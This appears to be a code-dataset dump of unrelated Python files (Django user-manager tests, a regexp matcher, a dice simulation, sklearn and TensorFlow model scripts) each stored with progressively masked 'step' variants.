container if it is already running\n logging.info(str([x.name for x in client.containers.list()]))\n if 'airflow_pg' not in [x.name for x in client.containers.list()]:\n\n # launch postgres backend\n pg = client.containers.run(image='postgres',\n name='airflow_pg',\n auto_remove=True,\n detach=True,\n environment={\n 'POSTGRES_PASSWORD': 'airflow',\n 'POSTGRES_USER': 'airflow',\n 'PGDATA': '/airflow/data'\n },\n volumes={'airflow_pg_data': {'bind': '/airflow/data', 'mode': 'rw'}},\n ports={'5432/tcp': 5432}\n )\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import numpy as np mydict = {} mylist0 = np.array([1, 2, 3, 4, 5]) mylist1 = np.array([2, 3, 4, 5, 6]) print(mydict) print(mylist0) print(mylist1) for c in ('0', '1'): if c in mydict: mydict[c] += mylist0 else: mydict[c] = mylist0 print(mydict) for c in ('0', '1'): if c in mydict: mydict[c] += mylist1 else: mydict[c] = mylist1 print(mydict)
normal
{ "blob_id": "6e5b8be6182f39f185f4547f0abd84a4e404bf34", "index": 1861, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(mydict)\nprint(mylist0)\nprint(mylist1)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist0\n else:\n mydict[c] = mylist0\nprint(mydict)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist1\n else:\n mydict[c] = mylist1\nprint(mydict)\n", "step-3": "<mask token>\nmydict = {}\nmylist0 = np.array([1, 2, 3, 4, 5])\nmylist1 = np.array([2, 3, 4, 5, 6])\nprint(mydict)\nprint(mylist0)\nprint(mylist1)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist0\n else:\n mydict[c] = mylist0\nprint(mydict)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist1\n else:\n mydict[c] = mylist1\nprint(mydict)\n", "step-4": "import numpy as np\nmydict = {}\nmylist0 = np.array([1, 2, 3, 4, 5])\nmylist1 = np.array([2, 3, 4, 5, 6])\nprint(mydict)\nprint(mylist0)\nprint(mylist1)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist0\n else:\n mydict[c] = mylist0\nprint(mydict)\nfor c in ('0', '1'):\n if c in mydict:\n mydict[c] += mylist1\n else:\n mydict[c] = mylist1\nprint(mydict)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*- from __future__ import unicode_literals, absolute_import from datetime import datetime try: from unittest.mock import patch except ImportError: from mock import patch import pytest from django.test import TestCase try: from django.test import override_settings except ImportError: from django.test.utils import override_settings from django.utils import timezone from custom_email_user.models import EmailUser from custom_email_user.managers import EmailUserManager fake_now = datetime(2015, 9, 10) @override_settings(USE_TZ=False) class TestEmailUserManager(TestCase): def setUp(self): self.email = '[email protected]' self.password = 'default' def test_private_create_user_without_email(self): """ Test that EmailUser.objects._create_user without email raise an ValueError exception """ with pytest.raises(ValueError) as exinfo: EmailUser.objects._create_user(None, None, False, False) self.assertIn('email must be set', str(exinfo.value)) @patch.object(timezone, 'now', return_value=fake_now) def test_private_create_user_its_ok(self, mock_now): user = EmailUser.objects._create_user(self.email, self.password, True, False) self.assertTrue(isinstance(user, EmailUser)) self.assertIsNotNone(user.pk) self.assertEqual(user.email, self.email) self.assertEqual(user.date_joined, fake_now) self.assertEqual(user.last_login, fake_now) self.assertTrue(user.is_staff) self.assertTrue(user.is_active) self.assertFalse(user.is_superuser) self.assertTrue(user.check_password(self.password)) def test_private_create_user_with_wrong_email(self): with pytest.raises(ValueError) as exinfo: EmailUser.objects._create_user('wrong@example', None, False, False) self.assertIn('email must be a valid email', str(exinfo.value)) @patch.object(EmailUserManager, '_create_user') def test_create_user_call_private_create_user_without_staff( self, mock_create_user): EmailUser.objects.create_user(self.email, self.password) mock_create_user.assert_called_once_with( self.email, self.password, False, False) @patch.object(EmailUserManager, '_create_user') def test_create_user_call_private_create_user_with_staff( self, mock_create_user): EmailUser.objects.create_user(self.email, self.password, True) mock_create_user.assert_called_once_with( self.email, self.password, True, False) @patch.object(EmailUserManager, '_create_user') def test_create_superuser_call_private_create_user(self, mock_create_user): EmailUser.objects.create_superuser(self.email, self.password) mock_create_user.assert_called_once_with( self.email, self.password, True, True)
normal
{ "blob_id": "71f9d9d7973809654db3ea613073f2d431f2d65f", "index": 1510, "step-1": "<mask token>\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n <mask token>\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-2": "<mask token>\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n<mask token>\ntry:\n from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\n<mask token>\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-3": "<mask token>\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n<mask token>\ntry:\n from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\n<mask token>\nfake_now = datetime(2015, 9, 10)\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-4": "from __future__ import unicode_literals, absolute_import\nfrom datetime import datetime\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\nimport pytest\nfrom django.test import TestCase\ntry:\n from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\nfrom django.utils import timezone\nfrom custom_email_user.models import EmailUser\nfrom custom_email_user.managers import EmailUserManager\nfake_now = datetime(2015, 9, 10)\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password, \n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(self,\n mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(self.email, self.password,\n True, True)\n", "step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nfrom datetime import datetime\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\nimport pytest\n\nfrom django.test import TestCase\ntry:\n from django.test import override_settings\nexcept ImportError:\n from django.test.utils import override_settings\nfrom django.utils import timezone\n\nfrom custom_email_user.models import EmailUser\nfrom custom_email_user.managers import EmailUserManager\n\nfake_now = datetime(2015, 9, 10)\n\n\n@override_settings(USE_TZ=False)\nclass TestEmailUserManager(TestCase):\n\n def setUp(self):\n self.email = '[email protected]'\n self.password = 'default'\n\n def test_private_create_user_without_email(self):\n \"\"\"\n Test that EmailUser.objects._create_user without email raise an\n ValueError exception\n \"\"\"\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user(None, None, False, False)\n self.assertIn('email must be set', str(exinfo.value))\n\n @patch.object(timezone, 'now', return_value=fake_now)\n def test_private_create_user_its_ok(self, mock_now):\n user = EmailUser.objects._create_user(self.email, self.password,\n True, False)\n self.assertTrue(isinstance(user, EmailUser))\n self.assertIsNotNone(user.pk)\n self.assertEqual(user.email, self.email)\n self.assertEqual(user.date_joined, fake_now)\n self.assertEqual(user.last_login, fake_now)\n self.assertTrue(user.is_staff)\n self.assertTrue(user.is_active)\n self.assertFalse(user.is_superuser)\n self.assertTrue(user.check_password(self.password))\n\n def test_private_create_user_with_wrong_email(self):\n with pytest.raises(ValueError) as exinfo:\n EmailUser.objects._create_user('wrong@example', None, False, False)\n self.assertIn('email must be a valid email', str(exinfo.value))\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_without_staff(\n self, mock_create_user):\n EmailUser.objects.create_user(self.email, self.password)\n mock_create_user.assert_called_once_with(\n self.email, self.password, False, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_user_call_private_create_user_with_staff(\n self, mock_create_user):\n EmailUser.objects.create_user(self.email, self.password, True)\n mock_create_user.assert_called_once_with(\n self.email, self.password, True, False)\n\n @patch.object(EmailUserManager, '_create_user')\n def test_create_superuser_call_private_create_user(self, mock_create_user):\n EmailUser.objects.create_superuser(self.email, self.password)\n mock_create_user.assert_called_once_with(\n self.email, self.password, True, True)\n\n\n", "step-ids": [ 7, 9, 10, 11, 12 ] }
[ 7, 9, 10, 11, 12 ]
def regexp_engine(pattern, letter): return pattern in ('', '.', letter) def match_regexp(pattern, substring): if not pattern: # pattern is empty always True return True if substring: # if string is not empty try the regexp engine if regexp_engine(pattern[0], substring[0]): # if reg and letter match return match_regexp(pattern[1:], substring[1:]) return False # if reg and letter not match or string has been consumed def regexp(pattern, word): # check if word is empty but catch the condition ' | ' if not word and pattern: return False # if string is not empty so feeds params into regexp match if not match_regexp(pattern, word): # if regexp return False, try to cut the word return regexp(pattern, word[1:]) return True print(regexp(*(input().split('|'))))
normal
{ "blob_id": "fbfc1749252cf8cbd9f8f72df268284d3e05d6dc", "index": 8024, "step-1": "<mask token>\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\n<mask token>\n", "step-2": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\n<mask token>\n", "step-3": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\ndef regexp(pattern, word):\n if not word and pattern:\n return False\n if not match_regexp(pattern, word):\n return regexp(pattern, word[1:])\n return True\n\n\n<mask token>\n", "step-4": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern:\n return True\n if substring:\n if regexp_engine(pattern[0], substring[0]):\n return match_regexp(pattern[1:], substring[1:])\n return False\n\n\ndef regexp(pattern, word):\n if not word and pattern:\n return False\n if not match_regexp(pattern, word):\n return regexp(pattern, word[1:])\n return True\n\n\nprint(regexp(*input().split('|')))\n", "step-5": "def regexp_engine(pattern, letter):\n return pattern in ('', '.', letter)\n\n\ndef match_regexp(pattern, substring):\n if not pattern: # pattern is empty always True\n return True\n if substring: # if string is not empty try the regexp engine\n if regexp_engine(pattern[0], substring[0]): # if reg and letter match\n return match_regexp(pattern[1:], substring[1:])\n return False # if reg and letter not match or string has been consumed\n\n\ndef regexp(pattern, word):\n # check if word is empty but catch the condition ' | '\n if not word and pattern:\n return False\n # if string is not empty so feeds params into regexp match\n if not match_regexp(pattern, word):\n # if regexp return False, try to cut the word\n return regexp(pattern, word[1:])\n return True\n\n\nprint(regexp(*(input().split('|'))))", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
''' You're playing casino dice game. You roll a die once. If you reroll, you earn the amount equal to the number on your second roll otherwise, you earn the amount equal to the number on your first roll. Assuming you adopt a profit-maximizing strategy, what would be the expected amount of money you would win? This question was asked in a data scientist interview at Tinder. ''' import numpy as np for threshold in range(1, 6): rolls = np.random.randint(1, 7, size=10**7) rerolls = np.random.randint(1, 7, size=10**7) avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls)) print(f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.')
normal
{ "blob_id": "e5d704541acd0f68a7885d7323118e1552e064c9", "index": 6170, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor threshold in range(1, 6):\n rolls = np.random.randint(1, 7, size=10 ** 7)\n rerolls = np.random.randint(1, 7, size=10 ** 7)\n avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls))\n print(\n f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.'\n )\n", "step-3": "<mask token>\nimport numpy as np\nfor threshold in range(1, 6):\n rolls = np.random.randint(1, 7, size=10 ** 7)\n rerolls = np.random.randint(1, 7, size=10 ** 7)\n avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls))\n print(\n f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.'\n )\n", "step-4": "'''\nYou're playing casino dice game. You roll a die once. If you reroll, you earn the amount equal to the number on your second roll otherwise, you earn the amount equal to the number on your first roll.\n\nAssuming you adopt a profit-maximizing strategy, what would be the expected amount of money you would win?\n\nThis question was asked in a data scientist interview at Tinder.\n'''\n\nimport numpy as np\n\nfor threshold in range(1, 6):\n rolls = np.random.randint(1, 7, size=10**7)\n rerolls = np.random.randint(1, 7, size=10**7)\n avg_roll = np.mean(np.where(rolls <= threshold, rerolls, rolls))\n print(f'Rerolling all {threshold}s and below yields an average roll of {avg_roll}.')\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import pandas as pd from sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier from sklearn.model_selection import train_test_split # Import train_test_split function from sklearn import metrics #Import scikit-learn metrics module for accuracy calculation from sklearn.tree import DecisionTreeRegressor from sklearn.linear_model import BayesianRidge, LinearRegression import os import sys import sklearn.metrics as mets from review import set_metrics as set_metrics from algo import Regression import draw #https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution #https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/ #https://datascienceplus.com/keras-regression-based-neural-networks/ #xgboost #random forest #lstm #rnn #dec tree #logistic regression #ann #naive bayes #monte carlo def read_atomic_data(path): if not path or not os.path.exists(path) or not os.path.isfile(path): print("To begin with, your path to data should be proper!") sys.exit(1) df = pd.read_csv(path) columns = df.columns.tolist() # get the columns columns = columns[:-1] df = pd.read_csv(path, usecols=columns) return df, columns def get_dataset(df, columns): X = df[col[:-1]] y = df.critical_temp X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1) return (X_train, X_test, y_train, y_test) df, col = read_atomic_data("unique_m.csv") (X_train, X_test, y_train, y_test) = get_dataset(df, col) from sklearn import preprocessing X_train = preprocessing.scale(X_train) X_test = preprocessing.scale(X_test) results = {} R = Regression(X_train, X_test, y_train, y_test) dict = R.run() print (dict) draw.draw(dict, 'r2_score') draw.draw(dict, 'max_error') draw.draw(dict, 'explained_variance_score') draw.draw(dict, 'mean_absolute_error') draw.draw(dict, 'mean_squared_error') draw.draw(dict, 'mean_squared_log_error') draw.draw(dict, 'median_absolute_error') sys.exit()
normal
{ "blob_id": "1e34087719f6fd0456d2722edbd0a7af68d37e4c", "index": 1577, "step-1": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n", "step-3": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\n<mask token>\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n", "step-4": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n", "step-5": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier\nfrom sklearn.model_selection import train_test_split # Import train_test_split function\nfrom sklearn import metrics #Import scikit-learn metrics module for accuracy calculation\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n#https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution\n#https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/\n#https://datascienceplus.com/keras-regression-based-neural-networks/\n\n#xgboost\n#random forest\n#lstm\n#rnn\n#dec tree\n#logistic regression\n#ann\n#naive bayes\n#monte carlo\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print(\"To begin with, your path to data should be proper!\")\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist() # get the columns\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1) \n return (X_train, X_test, y_train, y_test)\n\ndf, col = read_atomic_data(\"unique_m.csv\")\n(X_train, X_test, y_train, y_test) = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint (dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\n\nsys.exit()\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import tensorflow as tf from typing import Optional, Tuple, Union, Callable _data_augmentation = tf.keras.Sequential( [ tf.keras.layers.experimental.preprocessing.RandomFlip("horizontal"), tf.keras.layers.experimental.preprocessing.RandomRotation(0.2), ] ) def _freeze_model( model: tf.keras.Model, freeze: Union[bool, int, float] = False, ): # Obs: # When you set layer.trainable = False, the BatchNormalization layer will # run in inference mode, and will not update its mean and variance statistics # https://www.tensorflow.org/tutorials/images/transfer_learning#important_note_about_batchnormalization_layers if isinstance(freeze, int): freeze_len = freeze elif isinstance(freeze, float): freeze_len = int(freeze * len(model.layers)) else: # isinstance(freeze, bool): if freeze: freeze_len = len(model.layers) else: freeze_len = 0 if freeze_len != len(model.layers): model.trainable = True for layer in model.layers[:freeze_len]: layer.trainable = False def generate_model( base_model: tf.keras.Model, img_shape: Tuple[Optional[int], Optional[int], Optional[int]], freeze: Union[bool, int, float] = False, preprocess_input: Optional[Callable] = None, use_data_augmentation: bool = True, ): inputs = tf.keras.layers.Input(shape=img_shape) if use_data_augmentation: x = _data_augmentation(inputs) if preprocess_input is not None: x = preprocess_input(inputs) x = base_model(x, training=False) x = tf.keras.layers.GlobalAveragePooling2D()(x) x = tf.keras.layers.Dropout(0.2)(x) outputs = tf.keras.layers.Dense(1, activation="sigmoid")(x) model = tf.keras.Model(inputs, outputs) _freeze_model(base_model, freeze) base_learning_rate = 0.0001 model.compile( optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(), metrics=["accuracy"], ) return model
normal
{ "blob_id": "86d42716e05155f9e659b22c42635a8f5b8c4a60", "index": 753, "step-1": "<mask token>\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-2": "<mask token>\n\n\ndef _freeze_model(model: tf.keras.Model, freeze: Union[bool, int, float]=False\n ):\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n elif freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n if freeze_len != 